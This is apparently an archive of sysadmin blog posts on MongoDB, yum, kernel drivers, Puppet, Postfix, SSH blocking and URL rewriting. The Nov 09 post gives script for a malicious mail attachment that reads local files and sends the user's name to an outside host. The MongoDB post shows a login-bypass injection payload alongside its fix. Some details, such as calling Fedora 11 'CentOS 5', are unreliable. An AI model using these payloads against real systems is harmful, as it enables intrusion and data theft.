Jan 10

It's a common misconception that, because MongoDB does not use SQL, it is not vulnerable to SQL-injection-style attacks. PHP passes queries to the MongoDB server as objects (arrays) rather than SQL strings; for example, the following script selects an item from MongoDB where the username equals 'bob' and the password equals 'password'.

$collection->find(array(
    "username" => $_GET['username'],
    "passwd" => $_GET['passwd']
));

This is equivalent to the SQL

mysql_query("SELECT * FROM collection
    WHERE username=" . $_GET['username'] . "
    AND passwd=" . $_GET['passwd']);

In a normal SQL injection attack we can replace either of the two input parameters with a string such that the SQL query always returns true, e.g.

login.php?username=admin&passwd=" OR 1 --

That won't work with MongoDB; however, if we can pass an object to the PHP MongoDB driver we can alter the query in a similar fashion. Luckily PHP provides a way to pass arrays as GET or POST parameters:

login.php?username=admin&passwd[$ne]=1

This creates the MongoDB query

$collection->find(array(
    "username" => "admin",
    "passwd" => array('$ne' => 1)   // single quotes: "$ne" would be interpolated as a PHP variable
));

This is equivalent to the following SQL statement which, unless the password is "1", will always return true.

mysql_query("SELECT * FROM collection
    WHERE username='admin'
    AND passwd!=1");

The solution is to ensure your variables are properly typed before they are passed to the MongoDB driver. The following code is not vulnerable to this MongoDB injection, because the cast turns an injected array into a plain string:

$collection->find(array(
     "username" => (string)$_GET['username'],
     "passwd" => (string)$_GET['passwd']
));
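To see the mechanics end to end, here is an added example in Python (not code from the original post): it rebuilds $_GET from the query string the way PHP's bracket syntax does, evaluates the $ne condition the way the server would, and runs the same request against the string-cast version. parse_php_query, matches, vulnerable_find, hardened_find and the USERS collection are names and data assumed for the demonstration.

```python
# Added example (not from the original post): how PHP's bracket syntax turns
# "passwd[$ne]=1" into a nested array, and why the (string) cast stops it.
from urllib.parse import parse_qsl


def parse_php_query(query):
    """Build $_GET the way PHP does: 'a[b]=1' becomes {'a': {'b': '1'}}."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            name, sub = key[:-1].split("[", 1)
            params.setdefault(name, {})[sub] = value
        else:
            params[key] = value
    return params


def php_string_cast(value):
    """Mimic PHP's (string) cast: scalars stay text, an array becomes 'Array'."""
    return "Array" if isinstance(value, dict) else str(value)


def matches(doc, criteria):
    """Evaluate the subset of MongoDB query syntax the post uses: equality and $ne."""
    for field, cond in criteria.items():
        actual = doc.get(field)
        if isinstance(cond, dict):                 # operator object, e.g. {"$ne": "1"}
            for op, operand in cond.items():
                if op != "$ne":
                    raise ValueError("unsupported operator " + op)
                if actual == operand:
                    return False
        elif actual != cond:                       # plain equality match
            return False
    return True


def vulnerable_find(users, query):
    """find() with the raw $_GET values, as in the vulnerable snippet."""
    get = parse_php_query(query)
    criteria = {"username": get["username"], "passwd": get["passwd"]}
    return [u for u in users if matches(u, criteria)]


def hardened_find(users, query):
    """find() with every value cast to string before it reaches the driver."""
    get = parse_php_query(query)
    criteria = {"username": php_string_cast(get["username"]),
                "passwd": php_string_cast(get["passwd"])}
    return [u for u in users if matches(u, criteria)]


# Constructed sample collection (plain-text passwords only to mirror the post).
USERS = [{"username": "admin", "passwd": "s3cret"},
         {"username": "bob", "passwd": "password"}]

if __name__ == "__main__":
    payload = "username=admin&passwd[$ne]=1"
    print(vulnerable_find(USERS, payload))   # admin's document: login without the password
    print(hardened_find(USERS, payload))     # []: "Array" never equals a stored password
```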

Dec 06

The recently released Fedora 11 (CentOS 5) Leonidas has some issues with its regular update process. Many users are getting a strange error complaining that the update system cannot retrieve the repository metadata, namely repomd.xml. The error looks like this:

Error: Cannot retrieve repository metadata (repomd.xml) for repository: fedora. Please verify its path and try again

When we installed Fedora 11 (CentOS 5) for the first time we ran into the same problem, and a quick Twitter search showed that we were not alone. A little tweaking of a few system files brought us back on track; this article explains how to resolve the problem if you face it too.

1. Edit two of your repository files, /etc/yum.repos.d/fedora.repo and /etc/yum.repos.d/fedora-updates.repo: uncomment every line that starts with baseurl and comment out every line that starts with mirrorlist. Do this in both files.

2. Edit your /etc/hosts file and append the following line:

80.239.156.215 mirrors.fedoraproject.org

Alternatively, disable the yum-updatesd daemon in runlevel 3:

chkconfig --level 3 yum-updatesd off

/etc/rc.d/init.d/yum-updatesd stop

Now try updating your system or installing software via yum; the error should no longer appear. Leave gpgcheck=1 in both repository files, since with the mirror pinned by hand the package signatures are the only remaining check that what you download is genuine, and remove the /etc/hosts entry once the mirror list works again, because a hard-coded address will not follow future changes to mirrors.fedoraproject.org.

Dec 06

On a Dell PowerEdge 2950 I am using the CentOS 5.x packages for x86_64 together with the OpenVZ kernels. After the last update to the (as of CentOS 5.2) latest kernel, 2.6.18-92.1.1.el5.028stab057.2, I got alerted by the same kernel ERROR messages repeatedly shown in the dmesg output:
...
Fusion MPT base driver 3.04.05
Copyright (c) 1999-2007 LSI Corporation
Fusion MPT misc device (ioctl) driver 3.04.05
mptctl: Registered with Fusion MPT base driver
mptctl: /dev/mptctl @ (major,minor=10,220)
mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 - ioc0 not found!
mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 - ioc1 not found!
mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 - ioc2 not found!
...
These error messages seem to be triggered by ioctl operations on the device /dev/mptctl; you can reproduce them with
/usr/bin/srvadmin-services.sh restart
srvadmin-services.sh is part of the Dell Server Management software (Vers-5.2_rev-A00_Apr-2007 for the PowerEdge 2950; an optional install); the dsm_sa_datamgr32d process seems to be the only reader/writer of the device file:
[root@d2950]# fuser /dev/mptctl
/dev/mptctl: 19331 22642
[root@d2950]# ps -flp 19331 22642
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
5 S root 19331 1 0 78 0 – 34354 stext 11:49 ? 0:04 /opt/dell/srvadmin/dataeng/bin/dsm_sa_datamgr32d
5 S root 22642 19331 0 78 0 – 31537 – 11:49 ? 0:00 /opt/dell/srvadmin/dataeng/bin/dsm_sa_datamgr32d
When rebooting the box with the previously used kernel (as of CentOS 5.1), 2.6.18-53.1.6.el5.028stab053.6xen, I see in the dmesg output:
Fusion MPT misc device (ioctl) driver 3.04.04
mptctl: Registered with Fusion MPT base driver
mptctl: /dev/mptctl @ (major,minor=10,220)
--> so the new kernel (2.6.18-92.1.1.el5.028stab057.2) comes with a new driver release. Inspecting and comparing the source files of the kernel module mptctl.ko we see:
=====File: /usr/src/redhat/BUILD/ovzkernel-2.6.18-53.1.6.el5.028stab053.6/\
linux-2.6.18.x86_64/drivers/message/fusion/mptctl.c
=================SNIP-START==
static long
__mptctl_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    mpt_ioctl_header __user *uhdr = (void __user *) arg;
    mpt_ioctl_header khdr;
    int iocnum;
    unsigned iocnumX;
    int nonblock = (file->f_flags & O_NONBLOCK);
    int ret;
    MPT_ADAPTER *iocp = NULL;

    dctlprintk(("mptctl_ioctl() called\n"));

    if (copy_from_user(&khdr, uhdr, sizeof(khdr))) {
        printk(KERN_ERR "%s::mptctl_ioctl() @%d - "
               "Unable to copy mpt_ioctl_header data @ %p\n",
               __FILE__, __LINE__, uhdr);
        return -EFAULT;
    }
    ret = -ENXIO;               /* (-6) No such device or address */

    /* Verify intended MPT adapter - set iocnum and the adapter
     * pointer (iocp)
     */
    iocnumX = khdr.iocnum & 0xFF;
    if (((iocnum = mpt_verify_adapter(iocnumX, &iocp)) < 0) ||
        (iocp == NULL)) {
->      dctlprintk((KERN_ERR "%s::mptctl_ioctl() @%d - ioc%d not found!\n",
->                  __FILE__, __LINE__, iocnumX));
        return -ENODEV;
    }
=================SNIP-END==
=====File: /usr/src/redhat/BUILD/ovzkernel-2.6.18-92.1.1.el5.028stab057.2/\
linux-2.6.18.x86_64/drivers/message/fusion/mptctl.c
=================SNIP-START==
static long
__mptctl_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
    mpt_ioctl_header __user *uhdr = (void __user *) arg;
    mpt_ioctl_header khdr;
    int iocnum;
    unsigned iocnumX;
    int nonblock = (file->f_flags & O_NONBLOCK);
    int ret;
    MPT_ADAPTER *iocp = NULL;

    if (copy_from_user(&khdr, uhdr, sizeof(khdr))) {
        printk(KERN_ERR MYNAM "%s::mptctl_ioctl() @%d - "
               "Unable to copy mpt_ioctl_header data @ %p\n",
               __FILE__, __LINE__, uhdr);
        return -EFAULT;
    }
    ret = -ENXIO;               /* (-6) No such device or address */

    /* Verify intended MPT adapter - set iocnum and the adapter
     * pointer (iocp)
     */
    iocnumX = khdr.iocnum & 0xFF;
    if (((iocnum = mpt_verify_adapter(iocnumX, &iocp)) < 0) ||
        (iocp == NULL)) {
->      printk(KERN_DEBUG MYNAM "%s::mptctl_ioctl() @%d - ioc%d not found!\n",
->             __FILE__, __LINE__, iocnumX);
        return -ENODEV;
    }
=================SNIP-END==
The newer (CentOS 5.2) release of mptctl.c changed the dctlprintk() statement into a printk(). A debug message that was formerly compiled in ONLY with debug flags on (i.e. when the module Makefile contains CFLAGS_mptctl.o += -DMPT_DEBUG_IOCTL) is now enabled by default, and so we get a whole lot of messages; it is not clear whether __mptctl_ioctl() should really be that verbose.
Finally, on our CentOS powered box, I was able to compile a more silent mptctl.ko:
[root@d2950]# diff drivers/message/fusion/mptctl.c drivers/message/fusion/mptctl.c-original
595,607c595,596
< #ifdef _MeJ__wants__MPT_DEBUG_IOCTL
< /* MeJ 02-Oct-2008
< we want to get rid of a whole lot of kernel error messages like:
< mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc0 not found!
< mptctldrivers/message/fusion/mptctl.c::mptctl_ioctl() @596 – ioc1 not found!
< …..
< i.e. we disable the error message … in former versions of mptctl.c this
< printk() was active only when compiled with:
< CFLAGS_mptctl.o += -DMPT_DEBUG_IOCTL
< */
< printk(KERN_DEBUG MYNAM "%s::mptctl_ioctl() @%d – ioc%d not found!\n",
< __FILE__, __LINE__, iocnumX);
< #endif

> printk(KERN_DEBUG MYNAM "%s::mptctl_ioctl() @%d – ioc%d not found!\n",
> __FILE__, __LINE__, iocnumX);
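Review bot: the guard _MeJ__wants__MPT_DEBUG_IOCTL in the "<" lines at 595 is a private symbol that nothing defines, so the message can no longer be re-enabled through the existing "CFLAGS_mptctl.o += -DMPT_DEBUG_IOCTL" that the comment itself cites; guarding the printk() with "#ifdef MPT_DEBUG_IOCTL" instead restores the old behaviour (silent by default, visible in a debug build) without inventing a new macro. With the block compiled out, the adapter-not-found path leaves no trace in the default build; that is fine for the benign srvadmin probing described above, but a genuinely missing adapter is then reported only through the -ENODEV return to the caller.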
and after
make
srvadmin-services.sh stop
rmmod mptctl
mv /lib/modules/2.6.18-92.1.1.el5.028stab057.2/kernel/drivers/message/fusion/mptctl.ko \
   /lib/modules/2.6.18-92.1.1.el5.028stab057.2/kernel/drivers/message/fusion/mptctl.ko-original
cp drivers/message/fusion/mptctl.ko \
   /lib/modules/2.6.18-92.1.1.el5.028stab057.2/kernel/drivers/message/fusion/mptctl.ko
modprobe -a mptctl
srvadmin-services.sh start
the problem is fixed … open source is simply great ;-))))
Note that the replacement module lives in the directory of this one kernel version, so it has to be rebuilt and copied again after every kernel update.
Last but not least: thanks to all of you for providing such a great distro like CentOS to the community!

Dec 01

A puppet is an inanimate object or representational figure animated or manipulated by an entertainer, called a puppeteer. It is used in puppetry, a play or presentation that is a very ancient form of theatre.

There are many different varieties of puppets, made of a wide range of materials depending on their form and intended use. They can be extremely complex or very simple in their construction; they may even be found objects. As Oscar Wilde wrote, "There are many advantages in puppets. They never argue. They have no crude views about art. They have no private lives."

Installing Puppet

1. Install ruby

yum install ruby ruby-rdoc

2. Install the puppet server

wget http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm

rpm -Uvh epel-release-5-4.noarch.rpm

yum install puppet-server

chkconfig --level 2345 puppetmaster on

3. Modify the /etc/hosts file

192.168.1.2           puppet.mydomain.com    puppet

192.168.1.3           web1.mydomain.com      web1

4. Install the puppet client

wget http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm

rpm -Uvh epel-release-5-4.noarch.rpm

yum install puppet

chkconfig --level 2345 puppet on

5. Edit /etc/puppet/manifests/site.pp (server side) and start the puppet server

# Create "/tmp/testfile" if it doesn't exist.
class test_class {
    file { "/tmp/testfile":
        ensure => present,
        mode   => "644",
        owner  => root,
        group  => root
    }
}

# tell puppet on which client to run the class
node web1 {
    include test_class
}

service puppetmaster start

6. Start the client (a single verbose run)

/etc/init.d/puppet once -v

7. List the unsigned client certificate requests on the puppet server

puppetca --list

8. Sign the puppet client's certificate on the puppet server (sign only requests you expect from hosts you know; a signed client is trusted to fetch its catalog from now on)

puppetca --sign web1.mydomain.com

9. Test

puppetd --server puppet.mydomain.com --test
 
Nov 15

MMM (Multi-Master Replication Manager for MySQL) is a set of flexible scripts to perform monitoring/failover and management of MySQL master-master replication configurations (with only one node writable at any time).

The toolset also has the ability to read-balance standard master/slave configurations with any number of slaves, so you can use it to move virtual IP addresses around a group of servers depending on whether they are lagging in replication.

The current version of this software is stable, but the authors would appreciate any comments, suggestions, bug reports about this version to make it even better. Current version 2.0 development is led by Pascal Hofmann. If you require support, advice or assistance with deployment, please contact Percona or Open Query.

Nov 10

You can find the following information in the mongodb log:

Thu Nov 10 23:17:42 [initandlisten] MongoDB starting : pid=19198 port=27017 dbpath=/data/db/ 64-bit host=localhost.localdomain
Thu Nov 10 23:17:42 [initandlisten] db version v2.0.1, pdfile version 4.5
Thu Nov 10 23:17:42 [initandlisten] git version: 3a5cf0e2134a830d38d2d1aae7e88cac31bdd684
Thu Nov 10 23:17:42 [initandlisten] build info: Linux bs-linux64.10gen.cc 2.6.21.7-2.ec2.v1.2.fc8xen #1 SMP Fri Nov 20 17:48:28 EST 2009 x86_64 BOOST_LIB_VERSION=1_41
Thu Nov 10 23:17:42 [initandlisten] options: { config: "etc/mongo.conf", dbpath: "/data/db/", fork: "1", journal: "1", logpath: "/opt/wwh/mongo/logs/mongodb.log", maxConns: 200, port: 27017, repair: true, repairpath: "/tmp", syncdelay: 30.0 }
**************
old lock file: /data/db/mongod.lock.  probably means unclean shutdown,
but there are no journal files to recover.
this is likely human error or filesystem corruption.
found 3 dbs.
see: http://dochub.mongodb.org/core/repair for more information
*************

Start repair:

Step 1: stop mongod, then back up and delete mongodb.log

kill -2 `ps aux |grep mongod |grep -v grep |awk '{print $2}'`

rm -f mongodb.log

Step 2: delete the mongod lock file

rm -f /data/db/mongod.lock

Step 3: start mongod in repair mode (take a copy of the dbpath first: repair discards whatever it cannot recover)

bin/mongod -f etc/mongodb.conf --repair --repairpath /tmp

Nov 09

Send attachment demo.htm

Code:

<script>
xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");
xmlhttp.open("GET","../../../../../../../../../../../../../../boot.ini",false);
xmlhttp.send();
alert(xmlhttp.responseText);
</script>

Information:

<script>alert(document.URL)</script>

Get directory info:

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx

Demo:

<script>
var path = document.URL;
var regx = /Settings\\(.*)\\Local/;
var rs = regx.exec(path);
username = rs[1];
iframe_dom("http://www.80vul.com/hackgame/xs-g0.php?username="+username);

function iframe_dom(script_filename) {
    var d = window.document;
    var newIframe = d.createElement('iframe');
    newIframe.src = script_filename;
    newIframe.style.width = 0;
    newIframe.style.height = 0;
    d.appendChild(newIframe);
    return false;
}
</script>
Oct 26

Usage:

1. Delete all mail in the queue whose sender or recipient address contains the test.com domain

# perl pfdel.pl @test.com

2. Delete all mail in the queue containing the address a@test.com

# perl pfdel.pl a@test.com

3. Script content

#!/usr/bin/perl -w
#
# pfdel - deletes messages containing the specified address from the
# Postfix queue. Matches either sender or recipient address.
#
# Usage: pfdel <email_address>
#

use strict;

# Change these paths if necessary.
my $LISTQ = "/usr/sbin/postqueue -p";
my $POSTSUPER = "/usr/sbin/postsuper";

my $email_addr = "";
my $qid = "";
my $euid = $>;

if ( @ARGV != 1 ) {
	die "Usage: pfdel <email_address>\n";
} else {
	$email_addr = $ARGV[0];
}

if ( $euid != 0 ) {
	die "You must be root to delete queue files.\n";
}

open(QUEUE, "$LISTQ |") ||
  die "Can't get pipe to $LISTQ: $!\n";

my $entry = <QUEUE>;	# skip single header line
$/ = "";		# Rest of queue entries print on
			# multiple lines.
while ( $entry = <QUEUE> ) {
	# \Q...\E quotes the address so that '.' and other regex
	# metacharacters in it are matched literally.
	if ( $entry =~ / \Q$email_addr\E$/m ) {
		($qid) = split(/\s+/, $entry, 2);
		$qid =~ s/[\*\!]//;
		next unless ($qid);

		#
		# Execute postsuper -d with the queue id.
		# postsuper provides feedback when it deletes
		# messages. Let its output go through.
		#
		if ( system($POSTSUPER, "-d", $qid) != 0 ) {
			# If postsuper has a problem, bail.
			die "Error executing $POSTSUPER: error " .
			   "code " . ($? >> 8) . "\n";
		}
	}
}
close(QUEUE);

if (! $qid ) {
	die "No messages with the address <$email_addr> " .
	  "found in queue.\n";
}

exit 0;
Oct 24

Add the following entry to the crontab (it runs the scan every minute):

* * * * * root /home/cnscn/sh/ssh_scan_crontab.sh >/dev/null 2>&1

The ssh_scan_crontab.sh script:

$ cat /home/cnscn/sh/ssh_scan_crontab.sh
#!/bin/bash
# Author http://jabin.cublog.cn
# Modify cnscn http://cnscn2008.cublog.cn
# Modify xinyv

# force the C locale so awk's strftime month abbreviation matches the English log
export LC_ALL=UTC

# gather the last minute of sshd failures from /var/log/secure, count them per
# source address and drop repeat offenders with iptables
SCANNER=$(awk 'BEGIN{ tm=strftime("%b %e %H:%M",systime()-60);}  $0 ~ tm && /Failed password/ && /ssh2/ {print $(NF-3)}' /var/log/secure |sort|uniq -c |awk '{print $1"="$2;}')

for i in $SCANNER
do
       echo "$i"
       # get failure count
       NUM=`echo $i|awk -F= '{print $1}'`

       # get ip address
       IP=`echo $i|awk -F= '{print $2}'`

       # drop and log; grep -F -w matches the whole address, so 10.0.0.1
       # does not shadow 10.0.0.10 in the existing rule list
       if [ "$NUM" -gt 5 ] && ! /sbin/iptables -vnL INPUT | grep -qFw -- "$IP"
       then
               /sbin/iptables -I INPUT -s "$IP" -j DROP
               echo "/sbin/iptables -I INPUT -s $IP -j DROP" >> /home/cnscn/sh/ssh_scan_iptables.sh
               logger -i -t "ssh_scan_crontab" "$IP($NUM)..."
       fi
done
#End of Script
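As an added example (not part of the original scripts), here is the detection step of ssh_scan_crontab.sh in Python, run over constructed /var/log/secure lines and a constructed iptables listing: it applies the same one-minute window and threshold, matches the whole address when checking the existing rules, and only returns the commands it would run instead of executing them. The function names, sample lines and addresses are assumptions made for the demonstration.

```python
# Added example (not from the original post): the detection step of
# ssh_scan_crontab.sh in Python, run over constructed /var/log/secure lines.
import re
from collections import Counter
from datetime import datetime, timedelta

# Same signals the awk one-liner keys on: "Failed password", "ssh2", and the
# source address three fields before the end of the line.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} {1,2}\d{1,2} \d\d:\d\d):\d\d \S+ sshd\[\d+\]: "
    r"Failed password for .* from (?P<ip>\d+(?:\.\d+){3}) port \d+ ssh2$")

def minute_tag(now):
    """strftime('%b %e %H:%M') of one minute ago, as the script builds it (%e space-pads)."""
    t = now - timedelta(seconds=60)
    return f"{t:%b} {t.day:2d} {t:%H:%M}"

def count_failures(lines, now):
    """Count failed password attempts per source IP within the previous minute."""
    tag, hits = minute_tag(now), Counter()
    for line in lines:
        m = FAILED_RE.match(line.rstrip("\n"))
        if m and m.group("ts") == tag:
            hits[m.group("ip")] += 1
    return hits

def already_blocked(ip, iptables_output):
    """Whole-address match on `iptables -vnL INPUT`: 10.0.0.1 must not shadow 10.0.0.10."""
    pat = re.compile(r"\bDROP\b.*\s" + re.escape(ip) + r"\s")
    return any(pat.search(line) for line in iptables_output.splitlines())

def rules_to_add(lines, iptables_output, now, threshold=5):
    """Return the iptables commands the cron job would run; nothing is executed here."""
    return [f"/sbin/iptables -I INPUT -s {ip} -j DROP"
            for ip, num in sorted(count_failures(lines, now).items())
            if num > threshold and not already_blocked(ip, iptables_output)]

# Constructed sample input: the run happens at 03:05:10, so only 03:04 lines count.
NOW = datetime(2011, 10, 24, 3, 5, 10)
SAMPLE_LOG = (
    [f"Oct 24 03:04:{s:02d} host sshd[2231]: Failed password for root from 203.0.113.7 port 5{s}000 ssh2" for s in range(6)]
    + [f"Oct 24 03:04:{s:02d} host sshd[2240]: Failed password for invalid user test from 198.51.100.9 port 40{s} ssh2" for s in range(3)]
    + [f"Oct 24 03:04:{s:02d} host sshd[2250]: Failed password for admin from 192.0.2.3 port 41{s} ssh2" for s in range(7)]
    + [f"Oct 24 03:03:{s:02d} host sshd[2200]: Failed password for root from 203.0.113.7 port 42{s} ssh2" for s in range(4)]
    + ["Oct 24 03:04:30 host sshd[2260]: Accepted publickey for deploy from 203.0.113.50 port 43000 ssh2"])
IPTABLES_OUTPUT = """Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0 DROP       all  --  *      *       192.0.2.3            0.0.0.0/0
   12   720 DROP       all  --  *      *       192.0.2.30           0.0.0.0/0
"""

if __name__ == "__main__":
    for cmd in rules_to_add(SAMPLE_LOG, IPTABLES_OUTPUT, NOW):
        print(cmd)   # /sbin/iptables -I INPUT -s 203.0.113.7 -j DROP
```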
Start it when the system boots (myiptables.sh):

$ cat myiptables.sh
#!/bin/bash
#chkconfig: 345 85 15
#description: my iptables rules, which can auto run when system start

# This is a script
# Edit by liwei, cnscn
# establish a static firewall

#network interface
interdevice="eth0"

#port
#21       ftp
#15022    sshd
#25       smtp
#53       named
#80       http
#110      pop3

#Allow Access port
Open_ports="21 20 22 80"

#
Allow_ports="21 20 80 "

#clean old rules
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X

#Add the DROP rules collected by ssh_scan_crontab.sh (the file may not exist yet)
[ -f /home/cnscn/sh/ssh_scan_iptables.sh ] && sh /home/cnscn/sh/ssh_scan_iptables.sh

#Allow My ip
/sbin/iptables -I INPUT -s 111.127.xxx.xxx -j ACCEPT

for eths in $interdevice ; do

  #
  #iptables -A INPUT -i ! $eths -j ACCEPT

  #Allow replies to connections this host opened itself (yum, wget, ...);
  #without this the REJECT rules below cut them off
  iptables -A INPUT -i $eths -m state --state ESTABLISHED,RELATED -j ACCEPT

  #Allow all access's port(--dport)
  for Port in $Open_ports ; do
    iptables -A INPUT -i $eths -p tcp --dport $Port -j ACCEPT
    iptables -A INPUT -i $eths -p udp --dport $Port -j ACCEPT
  done

  #Reject everything else on this interface
  iptables -A INPUT -i $eths -p tcp -j REJECT --reject-with tcp-reset
  iptables -A INPUT -i $eths -p udp -j REJECT --reject-with icmp-port-unreachable
done

#forbid ping (1 = ignore all ICMP echo requests)
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

#End of Script
Oct 09

1. Download ISAPI_Rewrite

2. Unzip iis_urlrewrite.zip into a dedicated directory (example: c:\rewrite)

3. Add the ISAPI filter to the site in question

4. Restart IIS

5. Rewrite rules

   5.1 Redirect domain.com to www.domain.com

# ISAPI_Rewrite 2.x
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteCond Host: ^domain\.com$
RewriteRule (.*) http\://www\.domain\.com$1 [I,RP]

# ISAPI_Rewrite 3.0
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteCond %{HTTP:Host} ^domain\.com$
RewriteRule (.*) http\://www\.domain\.com$1 [NC,R=301]

   5.2 Redirect oldpage.html to newpage.html

# ISAPI_Rewrite 2.x
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteRule ^/oldpage.html$ http://domain.com/newpage.html [I,O,RP,L]

# ISAPI_Rewrite 3.0
[ISAPI_Rewrite]
# 3600 = 1 hour
CacheClockRate 3600
RepeatLimit 32
RewriteRule ^/oldpage.html$ http://domain.com/newpage.html [NC,L,R=301,O]

6. Reference

http://www.isapirewrite.com/
